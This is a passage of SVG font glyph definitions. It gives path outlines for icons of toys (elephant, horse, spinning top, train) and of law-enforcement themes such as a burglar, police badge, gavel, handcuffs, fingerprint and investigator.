<glyph glyph-name="toy-elephant" horiz-adv-x="1000" unicode="&#xebab;" d="M989 432c-63 182-275 248-431 230 114-86 139-214 66-312-48-65-166-103-224-51 129-9 209 38 230 137 18 87-28 174-110 205-57 21-111 13-160-23-48-34-66-87-80-147-17 32 9 57-1 86-8-7-13-11-18-16-67-73-88-157-58-253 15-47 10-90-30-121-38-29-66-5-94 23-21 22-48 7-68-7-22-16-6-36 4-53 12-22 33-37 55-48 82-40 170-12 229 73 35 50 77 69 116 53 37-16 59-65 52-120-2-13-11-28 3-37 31-20 65-19 100-7 29 11 19 34 16 55-8 75 46 131 119 122 70-9 104-48 105-120 1-50 15-61 63-48 24 6 40 23 54 41 25 34 38 73 48 114 18 74 38 154 14 224z" />
<glyph glyph-name="toy-hand" horiz-adv-x="1000" unicode="&#xebac;" d="M144 375c21 16 38 34 52 56 16 26 22 55 24 85 2 36 17 65 47 86 18 12 38 14 58 16 65 5 113 35 147 90 0 1 1 1 2 2 11-20 18-42 22-65 10-60 0-117-30-170-3-5-3-8 1-12 59-59 118-118 176-177 6-5 10-6 18-2 138 75 312-11 336-166 20-131-70-250-200-266-121-15-235 70-255 190-8 52 0 101 24 147 4 6 3 10-2 14-60 60-119 120-179 179-5 5-8 4-12 1-41-23-85-34-131-32-32 1-62 8-90 20-3 1-5 2-8 4z m625-179c-66-1-116-52-115-118 1-62 54-114 115-113 66 1 117 54 116 120-1 61-55 112-116 111z m-769 406c2 126 92 229 218 246 72 9 136-10 192-56 5-4 6-8 5-15-8-46-44-78-96-82-57-4-105-25-140-71-23-29-33-62-36-98-2-31-11-59-35-81-28-24-37-23-58 5-33 45-49 95-50 152z" />
<glyph glyph-name="toy-horse" horiz-adv-x="1000" unicode="&#xebad;" d="M293 501c0-33 20-54 53-55 39 0 77 0 115 0 33 0 53 21 53 53 1 19 1 38 1 58 0 17 0 35 0 54-13-6-25-12-37-16-29-9-59-9-89-8-29 1-58 4-87 4-7 0-9-2-9-9 0-27 0-54 0-81z m456 80c10 1 15 4 18 14 5 14 13 27 26 36 6 4 10 3 13-4 3-10 4-21 6-31 4-24 5-48 13-71 9-21 23-24 39-9 4 3 7 8 10 12 9 14 8 30 13 46 3 14 17 26 26 37 8 10 9 24 10 36 1 14 16 17 28 21 7 2 8 7 4 14-17 25-34 48-60 65-37 24-80 27-120 29-20-1-37-2-55-4-61-8-110-36-145-87-4-6-4-10-1-16 35-61 105-96 175-88z m247-440c-15 14-29 29-43 43-15 14-15 14-30 0-2-1-4-3-6-5-5-7-8-6-13 1-51 81-102 162-153 242-4 5-5 10-5 16 0 41 3 81 11 120 2 8 0 9-8 8-41-5-79 4-115 25-31 17-54 41-73 72-8-11-14-22-23-30-7-7-9-14-9-23 0-36 0-71 0-107 0-45-26-72-71-72-37 0-74 1-111 0-40 0-68 28-69 69 0 27 0 54 1 81 0 6-1 8-8 6-18-4-34-10-48-22-7-6-11-5-18 1-33 28-73 32-109 11-59-35-81-125-43-182 26-39 64-65 106-85 7-3 8-5 4-11-23-36-46-72-69-108-12-20-12-20-29-4-2 2-4 4-6 6-4 5-7 5-12 0-17-18-25-26-42-43-6-5-6-25 0-30 36-36 67-59 110-86 161-99 334-131 520-95 139 26 259 91 361 190 5 5 4 8 0 12z m-855 294c-6 13-7 27-8 38 1 16 3 29 10 41 9 15 26 22 43 17 3-1 6-2 5-7-12-40-5-80 0-120 1-10-1-12-10-9-22 5-33 21-40 40z m690-323c-74-45-153-75-238-89-32-5-64-7-98-8-109 1-214 28-311 83-6 4-13 8-19 12-11 7-12 7-5 18 26 40 52 81 78 122 14 22 28 45 43 67 7 12 18 18 33 16 75-11 150-18 225-17 37 1 73 3 108 16 12 4 23 9 34 16 5 3 8 3 12-2 46-75 93-149 141-223 3-5 2-7-3-11z m-270 551z" />
<glyph glyph-name="toy-lattu" horiz-adv-x="1000" unicode="&#xebae;" d="M832 436c-3 19-10 25-29 25-101-1-202-1-303-1v0c-102 0-204-1-305 0-17 0-25-4-28-21-9-55-9-108 7-162 31-107 100-180 199-227 49-22 84-58 109-105 6-11 9-20-5-30-18-14-18-39-4-54 14-14 39-15 53-1 16 15 15 41-4 56-12 9-10 16-5 26 16 32 37 60 65 81 35 26 76 42 111 66 109 75 166 218 139 347z m-623 59c97 1 194 1 290 1 98 0 196 0 293 0 17-1 24 1 14 21-58 123-199 212-353 188-118-18-204-81-258-188-10-19-5-22 14-22z m230 259c0-15 6-16 18-15 18 1 37 3 55 3 50-3 50-3 49 45 0 20 9 44-3 57-13 13-38-1-54 4-18 0-34-1-49 0-13 1-16-4-16-17 1-25 1-51 0-77z" />
<glyph glyph-name="toy-train" horiz-adv-x="1000" unicode="&#xebaf;" d="M246 465c55 0 111 0 166 0 9 0 12 2 12 11-1 95-1 191 0 286 0 9-3 11-11 11-84 0-167 0-251 0-7 0-9-2-9-9 1-70 0-140 1-210 0-9-2-13-12-12-19 1-38 1-56 0-7 0-9 2-9 8 0 56 0 111 0 167 0 17 1 34 0 51-2 41 30 82 83 82 74-1 148 0 223 0 16 0 33 1 49-1 39-5 68-37 68-77 0-98 0-196 0-295 0-10 2-12 12-12 31 1 63 1 94 0 8 0 10 2 10 10 0 19 0 38 0 56-1 8 1 11 10 11 62 0 124 0 186 0 7 0 9-2 9-9l-1-59c0-7 1-10 10-11 89-8 162-85 169-174 4-46-8-88-34-125-4-6-5-9 3-13 24-12 36-37 31-63-5-24-25-42-51-45l-5-1c-8-1-17 3-22-2-5-4-5-14-7-21-26-95-107-161-204-168-85-6-153 27-204 95-6 7-7 5-12-1-39-53-92-85-157-93-76-9-142 14-195 69-31 32-51 70-60 114-1 6-4 7-9 7-11 0-22-1-33 3-23 9-37 26-39 51-2 23 8 41 28 53 9 4 10 10 10 18 0 85 0 170 0 255 0 28 15 43 43 43 55 0 109 0 164 0z m175-366c10 0 20 1 30 0 8 0 10 2 8 10-16 85-96 139-181 123-82-16-137-97-122-178 13-68 65-117 133-126 65-9 129 26 158 88 3 5 6 7 11 7 26 0 51-1 77 0 10 0 17-1 20-12 2-6 6-10 9-15 41-63 120-86 190-57 67 28 105 102 89 174-16 73-80 123-154 121-73-1-135-54-148-126-1-7 0-9 7-9 19 1 38 1 57 0 9 0 14 2 17 11 15 38 57 56 96 43 37-12 58-52 49-90-8-34-36-56-71-59-32-2-63 19-75 50-2 4-3 8-9 8-74-1-148-1-222 0-6 0-8-3-10-8-15-37-51-57-89-48-37 8-61 41-59 80 1 32 26 61 56 69 34 8 71-5 84-35 9-19 20-23 38-21 4 1 8 0 11 0z m297 481c-31 0-61 1-92 0-8 0-10 3-10 10 0 29 0 29 28 29 55 0 110-1 166 0 8 0 12-2 10-11-1-9 4-20-1-25-5-6-17-2-25-2-25-1-51 0-76 0v-1z" />
<glyph glyph-name="burglar" horiz-adv-x="1000" unicode="&#xebb0;" d="M799 453c-3-57-5-114-8-171-3-43-15-81-40-115-5-8-17-19-6-28 10-9 18 5 25 11 26 22 26 23 54 4 29-19 58-39 86-58 32-22 42-55 43-91 0-6-2-11-8-12-87-23-167-64-251-96-67-26-135-45-206-47-53-1-105 5-157 16-88 19-172 49-258 72-25 7-25 7-25 33 0 35 13 64 39 88 43 40 92 70 143 99 6 3 10 3 15-3 10-13 20-25 31-38 3-4 7-9 13-7 6 3 5 9 5 15-1 11-6 21-12 30-35 57-50 119-51 186-1 54-6 107-1 161 7 68 10 136 36 201 16 40 42 71 80 93 47 26 94 49 149 53 44 4 85-7 127-21 110-40 153-129 171-235 8-47 7-93 6-140z m-156-62c52 0 86 32 91 84 4 44-18 86-64 98-33 9-63-2-91-16-44-22-84-18-126 5-17 9-35 19-55 20-40 4-72-15-86-48-17-39-10-86 18-112 31-30 81-33 116-6 12 10 23 22 35 32 27 24 56 22 80-4 8-8 15-16 22-24 17-19 38-31 60-29z m-141-95c-15 0-30-1-45-3-38-7-60-34-64-85-2-23 21-51 50-61 3-1 5-1 8-2 40-9 80-8 120 0 32 7 51 27 59 58 8 36-2 74-46 83-27 6-54 9-82 10z" />
<glyph glyph-name="cannon-firing" horiz-adv-x="1000" unicode="&#xebb1;" d="M833 463c-3 45-5 90-7 134-1 13-5 16-17 15-114-3-229-5-344-7-64 0-129-3-194-4-51-1-103-2-155-3-8-1-12-2-12-13 4-61 8-123 11-185 0-10 3-13 13-12 19 2 39 4 59 6 6 0 9 3 9 10-1 13 0 26 0 39-1 8 2 11 10 10 23 0 46 0 69 0 7 0 12 2 18 6 84 64 190 64 273 1 6-5 11-7 18-7 28 1 56 0 84 0 7 0 17 4 17-10-1-5 4-3 7-2 44 4 87 8 131 12 8 0 11 2 10 10z m-403 30c-113 0-207-94-207-207 0-114 94-206 210-205 112 0 203 93 203 208-1 111-94 204-206 204z m128-104c19-23 29-50 34-78 2-9 0-15-12-13-19 2-38 2-54 3-17 0-27 9-30 24 0 4 1 5 3 7 16 19 33 38 49 57 5 5 7 4 10 0z m-109 61c30-4 57-15 81-34 6-4 8-7 1-13-18-15-35-30-53-45-8-8-31 0-32 11-2 25-3 50-5 75 0 7 4 6 8 6z m-121-35c24 19 52 30 83 35 7 1 10-1 7-10-1-21-2-44-4-67 0-5 1-11-7-12-9-1-15-13-26-3-17 16-35 31-53 46-5 4-6 7 0 11z m-62-111c4 32 16 60 36 86 4 4 6 3 9-1 16-18 33-37 49-56 5-6-5-30-13-31-25-2-50-3-73-5-7-1-9 2-8 7z m34-118c-19 24-30 51-33 81-2 16 12 3 16 8 22-2 43-3 64-5 11-1 19-24 12-32-15-18-30-34-45-52-6-6-9-7-14 0z m108-62c-32 4-61 17-87 39 22 19 42 37 63 55 6 5 30-6 30-14 2-25 3-49 5-74 1-10-7-7-11-6z m21 100c-34 0-60 28-61 63-1 33 32 65 62 61 31 3 62-27 62-62 0-34-29-63-63-62z m25-100c-9-2-14-1-13 11 2 21 3 43 4 64 1 7 0 13 10 14 8 1 15 12 25 1 18-18 38-34 58-51-25-22-53-34-84-39z m104 60c-4-6-6-5-10 0-16 18-32 36-47 54-7 8 1 31 12 32 21 2 42 3 60 5 22 0 22 0 18-20-5-26-16-50-33-71z m-520 18c-12-5-28-7-34-16-8-10-1-27-3-40-1-10 3-13 13-12 81 0 162 0 243 0 3 0 7-1 11 2-35 39-54 84-59 136-58-24-114-47-171-70z m631 97c0 43 0 86 0 129 0 5 2 11-6 11-24 0-48 0-72 0 79-102 80-203 0-305 21 0 42 1 61-1 13 0 17 3 17 16-1 50 0 100 0 150z m175 177c2-33 2-33 35-31 25 2 25 2 24 28 0 1 0 3 0 4-1 21-2 40-3 60-2 27-4 55-5 82-1 4 0 8-7 8-14-2-29-2-44-3-7 0-9-3-8-10 3-46 5-92 8-138z m109-306c-27 0-49-20-50-47 0-26 22-49 49-49 27-1 48 20 48 48 0 27-20 48-47 48z m-113 0c-28 0-49-21-49-48 0-27 22-48 48-48 27-1 49 22 49 49-1 27-21 47-48 47z m104 49c0 28-21 49-49 49-26 0-47-21-48-48 0-27 22-49 49-48 27 0 48 20 48 47z m-897 264c11-4 10-12 12-20 5-18 12-34 23-48 6-8 12-15 22-20-4 65-7 129-11 195-24-23-34-50-37-80-1-6 0-11-8-14-6-3-6-12-1-13z m224-44c-20 0-36 0-51 1-9 0-11-4-11-12 1-35 0-71 0-107 10 43 29 83 62 118z m160-127c-13 0-26-13-27-26 0-13 12-25 27-25 13 1 24 12 24 26 0 13-12 25-24 25z" />
<glyph glyph-name="cc-camera" horiz-adv-x="1000" unicode="&#xebb2;" d="M993 31c-24-47-62-68-110-68-256 0-511 0-767 0-9 0-19 1-28 3-25 6-33 19-23 43 6 15 15 29 23 43 4 8 9 14 4 24-9 18-17 36-27 59-18-31-34-58-49-86-39-73-5-136 78-146 9-1 18-1 28-1 252 0 504 0 756 0 13 0 26 1 38 3 68 9 99 58 77 126z m-649 465c39 69 79 138 119 207 26 43 49 44 75 1 31-54 62-108 93-163 7-11 15-19 28-24 47-20 74-60 72-108-1-36 12-61 27-88 20-34 40-68 59-102 24-40 24-40 48-1 7 10 15 16 6 31-95 164-189 329-286 493-43 74-124 74-168 1-62-104-121-209-186-321 25 11 42 20 60 26 25 8 41 25 53 48z m341-88c-2 34-23 58-60 68 2-6 4-9 5-12 13-31 13-31-18-44-121-54-242-107-364-160-18-8-35-11-54-3-17 7-35 12-53 18-12 4-22 0-31-7-10-9-2-18 1-26 9-21 19-42 27-63 6-16 13-15 27-9 39 16 77 36 117 51 17 7 25 11 32-9 4-13 14-6 21-3 30 13 59 27 89 39 21 9 43 29 60 22 18-7 20-38 28-58 8-23 14-43 43-22 7 5 17 1 24 8-11 27-21 55-33 81-7 16-3 22 12 28 28 11 55 23 83 36 31 14 47 37 44 65z m-386-105c98 47 198 88 298 131 19 8 19 16 11 31-18 35-51 47-89 30-95-41-190-83-284-124-45-19-89-39-138-60 20-7 36-11 50-18 53-27 101-15 152 10z m360-161c0-13 4-25 1-35-6-22 5-22 22-22 62 1 125-1 187 1 28 1 40-6 35-34-2-14 2-23 19-24 17 0 19 10 19 23 0 40 0 79 0 119 0 13 2 28-19 28-22 0-21-15-19-28 4-25-8-29-30-28-72 1-143 0-215 0z m-121-27c-1-23 17-43 40-44 23-1 43 18 43 41 0 24-18 43-41 43-22 0-41-18-42-40z m-414 19c10 3 8 13 5 22-15 32-28 64-43 96-4 9-9 20-26 18 18-42 35-82 53-122 2-6 3-17 11-14z" />
<glyph glyph-name="cop-badge" horiz-adv-x="1000" unicode="&#xebb3;" d="M492 850h16c4-4 8-7 12-11 77-75 170-110 277-115 32-1 64 0 97 1 15 0 22-8 23-23 0-1 0-3 0-4 0-139-1-278 0-416 1-78-20-149-66-211-86-115-202-184-339-219-6-2-12-3-19-1-133 32-246 98-333 206-51 64-78 138-77 221 1 113 0 227 0 340 0 27 0 54 0 81 0 19 8 26 27 26 2 0 5 0 7 0 45-3 89-2 133 4 47 6 92 18 134 40 41 21 75 50 108 81z m-160-417v0c-28 0-55 0-83 0-13 0-20-5-23-15-3-9 1-18 12-25 43-29 87-59 131-87 8-5 9-10 6-18-17-49-34-98-51-147-4-12 0-22 10-27 9-5 16-2 24 4l135 97c5 4 8 4 13 0 14-10 28-21 42-31 32-24 63-47 95-70 12-9 25-8 32 4 5 7 3 15 1 22-17 51-34 101-51 152-2 6-1 9 4 13 31 20 61 40 91 60 15 10 31 20 46 31 8 5 11 13 9 22-3 10-10 15-20 15-4 1-9 1-13 1h-152c-15 0-15 0-20 14-16 51-33 102-49 153-3 8-7 14-17 15-13 2-21-2-25-16-17-53-34-106-51-158-2-6-5-9-11-9-28 0-57 0-85 0z m52-246c6 17 10 32 15 47l23 64c4 13 2 21-10 28-29 20-58 39-87 58-3 2-5 4-8 6 4 3 8 2 11 2h106c18 0 22 3 28 21 12 38 25 76 37 115 4-2 4-6 5-9l35-107c5-17 9-20 27-20 35 0 70 0 105 0 4 0 8 0 12-2-3-2-5-4-8-6l-85-56c-13-9-15-16-11-30l35-104c1-2 1-5 2-9-15 11-28 20-41 30-20 15-40 30-59 44-12 9-19 9-31 0-30-21-60-43-90-65-3-1-6-3-11-7z" />
<glyph glyph-name="cop" horiz-adv-x="1000" unicode="&#xebb4;" d="M241 73c0 42 14 79 27 116 9 23 18 45 23 69 3 20-1 37-15 52-9 10-18 19-27 29-7 8-7 13 1 20 34 29 68 57 101 86 7 6 8 1 11-3 23-49 59-83 113-95 44-10 82 4 116 32 21 17 37 38 47 64 3 7 5 7 11 2 33-28 66-57 100-85 10-8 10-13 1-22-9-10-18-19-27-29-13-15-17-32-14-51 6-33 21-63 32-94 11-33 20-66 18-102-5-63-37-109-92-139-23-13-48-21-74-27-31-7-59-19-83-41-5-5-12-8-18-1-28 27-64 37-101 46-44 11-84 31-113 67-26 31-37 68-37 106z m182-11c0-8 7-12 15-7 19 11 37 23 55 34 5 3 9 3 14 0 17-11 34-21 51-32 5-2 10-7 16-3 5 5 2 11 1 16-5 19-9 39-14 58-2 6-1 9 4 13 15 13 31 26 46 40 4 3 10 6 8 12-3 7-9 6-15 7-20 1-40 3-60 4-5 1-8 3-11 8-7 19-16 39-24 58-2 5-3 9-9 10-6 0-7-5-9-10-8-19-17-38-24-57-3-6-6-8-13-9-20-1-40-3-60-4-5-1-11 0-13-7-2-5 3-8 7-11 14-13 28-26 43-37 8-6 10-12 7-21-5-21-10-42-15-62z m-99 520c1 15 1 30 14 40 3 2 2 7 2 10 0 20 0 20 19 14 43-16 88-24 135-26 53-1 105 9 154 28 12 5 12 5 12-8 0-9-1-18 8-25 5-3 6-10 7-17 6-43-9-79-37-111-5-5-9-12-11-19-7-23-20-44-36-61-54-59-133-57-186 3-14 18-26 37-32 59-3 7-6 12-11 18-24 27-38 58-38 95z m178 268c65-4 122-28 168-77 13-14 22-31 24-51 1-2 1-4 1-7 0-20-3-22-21-14-62 28-127 42-195 39-55-4-108-18-159-42-11-5-11-4-14 8-3 16 1 30 8 43 6 13 15 24 25 33 45 43 100 65 163 68z m-2-91c24 0 42 19 42 42 0 23-19 42-42 42-22 1-42-19-42-41 0-23 19-43 42-43z m181-76c-121-58-240-58-362 0 59 28 118 43 181 44 63 0 122-17 181-44z" />
<glyph glyph-name="court-hammer" horiz-adv-x="1000" unicode="&#xebb5;" d="M521 149c-15 26-37 36-66 41-104 17-208 15-312 4-42-4-78-18-97-59-6-13-15-23-23-35-35-50-33-55 29-67 77-17 155-17 229-21 66 2 127 4 187 11 33 4 66 9 97 22 14 6 20 13 8 29-19 24-37 49-52 75z m-57 0c-34-10-70-13-105-15-74-5-148-4-221 9-9 1-17 3-25 6-7 3-18 4-18 13 0 10 10 11 18 14 48 15 99 13 148 18 64 0 127-2 188-15 5-1 10-2 15-4 7-2 18-3 18-13 0-9-11-11-18-13z m-41 209c14-4 22 1 29 13 13 24 28 47 42 70 31 51 31 65-6 112 7 1 14 2 20 4 5 1 11 3 11 9 1 5-5 7-8 9-42 25-83 50-125 76-11 7-16 4-15-9 1-7 3-13 5-22-50 13-71 5-97-38-15-25-30-51-46-75-9-13-10-22 1-34 52-57 115-95 189-115z m505-127c1 14-6 26-24 34-108 53-216 106-325 159-42 20-42 19-67-21-8-14-8-20 7-30 110-63 219-128 328-193 39-23 78-1 81 51z m-698 144c35-22 71-44 107-65 33-19 61-13 89 21-89 20-160 64-218 132-17-36-10-67 22-88z m721-134c4-20 6-39-4-57-9-17-25-28-46-34 22-15 41-31 66-16 22 14 34 34 33 59-1 30-24 39-49 48z m-442 398c-39 17-69 66-121 43 0-3-1-5-2-8 49-29 97-59 147-89 8 28-3 45-24 54z" />
<glyph glyph-name="court" horiz-adv-x="1000" unicode="&#xebb6;" d="M224-58c-54 0-107 1-161 0-43-1-60-17-59-51 0-15 5-20 19-20 38 1 75 1 112 1v0c33 0 67 1 101-1 16-1 22 5 26 20 12 51 13 50-38 51z m30 90c-50 0-99 0-148-1-31-1-44-18-43-46 1-13 6-17 17-16 31 0 63 0 94 0v-1c28 0 57 1 85 0 17-1 24 5 28 22 10 42 11 42-33 42z m-222 531c22-6 45-6 67-6 133 0 266 0 399 0 74 0 148-1 223 0 70 0 141-1 212 1 19 0 48-4 53 20 6 24-21 34-38 43-127 71-255 142-383 212-44 24-88 23-133-2-122-68-245-134-367-202-15-8-30-16-43-29-16-17-13-31 10-37z m640-548c-3 13-9 17-22 17-100-1-200-1-300 0-12 0-18-4-21-17-11-43-23-87-34-130-7-29-2-35 29-35 59 0 117 0 176 0v0c61 0 121 1 181 0 23 0 31 9 25 30-11 45-24 90-34 135z m-545 514c-17-1-22-7-25-22-23-128-25-257-6-386 9-57 8-57 64-57 8 0 16 0 23 0 14-2 18 5 21 17 12 70 18 140 20 211-2 55-4 109-12 163-10 75-10 74-85 74z m230 0c-17-1-22-7-24-22-23-128-25-257-6-386 8-57 8-57 64-57 8 0 15 0 23 0 13-2 18 5 20 17 13 70 19 140 20 211-1 55-3 109-11 163-10 75-10 74-86 74z m286 0c-75 0-75 1-86-74-7-54-9-109-11-163 2-71 7-141 20-211 2-12 7-19 20-18 8 1 16 1 23 1 56 0 56 0 64 56 20 130 17 258-5 387-3 15-8 21-25 22z m231 0c-76 0-76 1-86-74-8-54-10-109-11-163 1-71 7-141 20-211 2-12 7-19 20-18 8 1 15 1 23 1 56 0 56 0 64 56 19 130 17 258-6 387-2 15-7 21-24 22z m63-588c-54 1-107 0-161 0-50 0-50 0-37-50 4-15 9-21 26-20 33 1 67 0 101 0v0c37 0 74 1 111 0 15 0 19 5 19 19 1 35-16 51-59 51z m-110 27v0c31 0 62 1 93 0 12 0 17 4 17 16 1 29-12 46-43 47-49 1-98 0-147 0-45 0-44 1-34-42 4-16 12-22 28-21 29 1 57 0 86 0z" />
<glyph glyph-name="finger-print" horiz-adv-x="1000" unicode="&#xebb7;" d="M531 850c18-4 36-4 53-8 123-23 221-84 297-183 46-61 75-130 86-206 10-64 9-130 7-195-1-56-8-112-18-168-4-25-25-41-49-37-24 5-38 26-33 52 18 98 19 197 14 297-2 49-13 96-35 141-59 119-154 194-285 216-153 27-278-27-376-145-13-14-27-22-46-17-30 7-42 42-22 68 29 36 61 67 98 94 68 49 144 79 227 89 5 0 11-1 16 2h66z m273-523c2-112-12-221-49-327-12-32-25-63-40-93-11-23-35-31-57-21s-29 35-18 58c34 68 57 140 69 215 10 57 12 115 11 173-1 32 1 65-7 97-23 86-79 139-164 161-50 12-98 5-144-16-24-12-49-4-59 19-10 22-1 45 23 56 176 87 392-21 428-213 7-36 5-73 7-109z m-421 2c1 27-2 55 4 82 13 58 65 99 125 97 60-2 113-46 121-104 6-45 7-91 6-136-1-24-21-41-45-40-22 1-40 19-39 43 1 38-2 77-4 115-1 19-18 36-38 38-22 2-39-10-44-31-1-6-2-12-2-18 0-28 0-57 0-86-3-145-70-250-201-314-13-6-26-11-39-16-22-8-46 3-54 25-8 22 2 45 25 53 44 17 84 39 117 74 39 40 59 89 66 144 3 24 1 49 2 74z m62-479c-9 0-22 8-29 23-8 16-7 31 4 45 28 34 51 70 70 109 16 33 29 67 38 102 5 20 20 32 39 33 18 1 35-10 42-28 3-9 2-18 0-27-24-88-64-168-121-239-9-11-20-19-43-18z m-420 514c-1 66 10 130 34 192 7 19 23 29 43 28 17-1 32-14 37-32 2-8 2-16-1-24-25-61-31-125-29-190 0-10 0-19 0-29 0-25-17-42-41-43-24 0-42 18-43 43 0 18 0 36 0 55z m254-79c-1-50-13-95-53-129-24-20-51-32-80-41-15-5-30-9-46-14-24-6-46 6-52 30-7 22 6 44 29 51 21 6 42 12 63 20 39 15 54 36 55 79 0 8-1 16 1 23 6 20 25 35 45 33 22-3 38-20 38-42v-10z m36 313c14 0 27-9 34-25 7-16 4-33-9-46-20-21-36-45-46-73-7-16-11-33-13-51-3-23-24-41-46-38-25 4-41 25-38 49 9 65 36 121 80 169 11 11 20 15 38 15z" />
<glyph glyph-name="gavel" horiz-adv-x="1000" unicode="&#xebb8;" d="M179 387c-9 9-22 9-31 0l-79-80c-8-9-8-22 0-31l245-252c8-9 21-9 30 0l83 83c8 8 8 22 0 30l-248 250z m527 29c8-8 22-8 30 0l83 83c9 8 9 22 0 31l-248 250c-8 9-22 9-30 0l-79-80c-9-9-9-23-1-31l245-253z m206-359c-94 93-187 187-281 280-3 3-6 5-11 9 13 12 24 23 35 34 9 8 9 22 1 31-67 69-133 138-200 207-8 9-22 9-30 1-63-65-126-129-190-194-8-8-9-22 0-31 65-69 129-138 195-207 8-8 21-8 30 0 14 15 29 30 45 45 3-4 6-8 9-11 93-94 187-187 280-281 24-23 52-31 84-22 32 10 52 33 57 67 5 28-4 52-24 72z" />
<glyph glyph-name="handcuff-alt" horiz-adv-x="1000" unicode="&#xebb9;" d="M803 577c0-16 0-33 1-50 0-9-6-23 5-27 12-5 23 5 32 13 9 8 14 20 15 31 7 65-10 122-65 161-38 28-82 47-129 59-31 9-56-3-78-27 58-21 113-39 164-68 36-20 53-51 55-92z m-626-77c11-4 17-2 17 12 0 20 2 41 2 62 0 46 21 79 62 100 49 25 101 43 153 62-17 26-45 37-77 28-37-10-72-26-105-45-65-36-99-103-87-176 4-20 15-35 35-43z m450 172c3 18-8 28-25 31-34 7-68 10-102 10-34 0-68-3-102-9-19-3-29-13-26-33 3-18 17-23 34-20 62 10 125 10 187 0 18-3 30 4 34 21z m-346-80c-4-3-8-5-7-12 6-40 12-43 50-29 10 4 21 7 31 11 27 13 49 31 65 63-20-3-36-3-50 6-2 1-7 1-9 0-22-22-53-26-80-39z m438-20c9 11 8 16-6 22-26 10-53 15-74 35-4 5-9 3-14 1-13-8-28-8-47-4 22-44 55-62 93-74 12-4 24-14 35-13 16 2 2 22 12 30 0 1 0 2 1 3z m178-201c-14 10-21 20-19 39 0 10-3 19-8 27v0h0c-7 12-19 20-35 21-53 1-53 1-54 55 0 15 1 30 0 45-1 13-10 21-24 20-13-1-19-9-20-21l0-45c-1-55-1-55-55-54-22 0-35-11-39-32-2-11-5-23-4-34 2-20-6-30-21-41-110-88-114-250-10-344 28-27 67-37 94-65 3-4 11-4 16-5 110-19 221 42 264 146 43 103 8 224-85 288z m-140 43c0 5 3 8 7 8h38c4 0 9 3 12 5 5 5 10 7 17 7 14 0 26-12 26-26s-12-26-26-26c-7 0-12 2-17 6-3 3-8 6-12 6h-38c-4 0-7 3-7 7v13z m-43-453c-9 0-16 8-16 17s7 17 16 17c10 0 17-8 17-17s-7-17-17-17z m27 51c-95 0-172 77-172 172 0 94 77 171 172 171s171-77 171-171c0-95-77-172-171-172z m-359 339c-14 11-23 21-21 41 1 11-2 23-4 34-4 21-17 32-39 32-54-1-54-1-55 54l0 45c-1 12-7 20-20 21-14 1-23-7-24-20-1-15 0-30 0-45-1-54-1-54-54-55-15-1-28-9-35-21h0v0c-5-8-8-17-7-27 1-19-6-29-20-39-93-64-128-185-85-288 43-104 154-165 264-146 5 1 13 1 17 5 26 28 65 38 93 65 104 94 100 256-10 344z m-213 83c7 0 12-2 17-7 3-2 8-5 12-5h38c4 0 8-3 8-8v-13c0-4-4-7-8-7h-38c-4 0-9-3-12-6-5-4-10-6-17-6-14 0-26 12-26 26s12 26 26 26z m117-473c-10 0-17 8-17 17s7 17 17 17c9 0 17-8 17-17s-8-17-17-17z m-27 51c-94 0-171 77-171 172 0 94 77 171 171 171s172-77 172-171c0-95-77-172-172-172z" />
<glyph glyph-name="handcuff" horiz-adv-x="1000" unicode="&#xebba;" d="M876 586c-63 34-142 37-187 107-5 8-34 11-46 4-39-20-60 5-87 24-89 63-146 57-238 2-103-62-98-204-205-260-5-3-7-16-6-23 8-50-23-80-52-114-78-92-71-227 11-315 79-86 213-102 308-39 102 67 141 196 88 304-31 64-97 111-87 196 2 18-23 29-42 34-44 11-42 46-26 70 23 33 55 63 89 84 27 16 62 11 92-11 36-26 13-42-1-66-13-21-12-49 5-69 27-33 34-68 24-102-7-140 66-245 185-272 119-27 243 41 285 156 39 108-6 235-110 290z m-632-132c19 0 35-16 35-35s-16-35-35-35-35 15-35 35c0 19 15 35 35 35z m162-275c2-94-73-170-165-169-89 1-161 74-161 165 1 92 69 162 161 162 92 1 163-68 165-158z m168 401c0 19 16 35 35 35s35-16 35-35c0-20-16-35-35-35s-35 15-35 35z m185-365c-93-1-163 66-165 158-1 93 65 165 157 167 92 3 172-72 172-163 0-87-74-160-164-162z" />
<glyph glyph-name="investigation" horiz-adv-x="1000" unicode="&#xebbb;" d="M899-150c-2 12-12 17-19 24-53 53-106 106-159 159-9 8-23 16-6 30 7 5 3 10-1 15-2 2-3 3-5 5-45 51-45 51-103 17-136-81-315-73-441 21-135 99-193 262-152 429 36 149 168 270 321 294 226 37 430-107 467-332 18-106-5-206-68-294-16-21-14-33 5-48 12-9 21-21 32-31 4-4 9-12 15-6 18 21 27 1 36-8 52-51 103-103 155-155 7-7 12-17 24-19v-12c-34-26-63-55-89-89h-12z m-844 598c0-190 150-346 336-349 201-4 361 152 359 356-1 191-156 340-344 340-195 1-350-152-351-347z m361-95c-21 5-48-14-62 4-11 14-3 40-6 61-3 33-17 63-28 94-23 66-5 127 31 182 21 32 53 33 81 3 56-59 83-131 70-214-6-39-20-77-21-117 0-13-5-17-17-16-16 2-31 2-48 3z m65-72c0-18-1-40-11-60-15-27-38-36-66-34-30 1-51 15-62 45-11 29-3 58 1 86 2 12 11 15 21 15 23 1 46 4 69 3 49-2 49-2 48-55z" />
<glyph glyph-name="investigator" horiz-adv-x="1000" unicode="&#xebbc;" d="M934 574h0 0z m-791-442h0v0l0 0z m360 38h0v0l0 0z m98 98l0 0h0l0 0z m126 0c2 41 31 78 31 78 5 29-15 25-15 25-71-7-112-45-112-45-7-20-17-39-28-56v0l0 0h0c-42-62-102-102-102-102s-100 65-132 158c0 0-40 38-112 45 0 0-19 4-15-25 0 0 29-37 31-78 0 0-94-58-132-144 0 0-30-56-17-203 0 0 154-80 376-70 222-10 376 70 376 70 14 147-17 203-17 203-38 86-132 144-132 144z m-54 115c93 54 84 134 84 134-7 13-20 11-20 11l-213 0c-22 0-21-32-21-32-4-90 68-112 68-112 63-22 102-1 102-1z m-347 0s38-21 101 1c0 0 73 21 69 112 0 0 1 32-21 32l-213 0s-13 1-20-11c0 0-9-80 84-134z m601 242s-17 56-208 67c0 0-21 136-126 152-23 3-74 8-93 5-18 3-69-2-92-5-106-16-127-152-127-152-190-11-207-67-207-67-36-62 43-89 71-90 49-3 93 2 195 29l160 24s59 4 161-24 145-32 194-29c29 1 108 28 72 90z" />
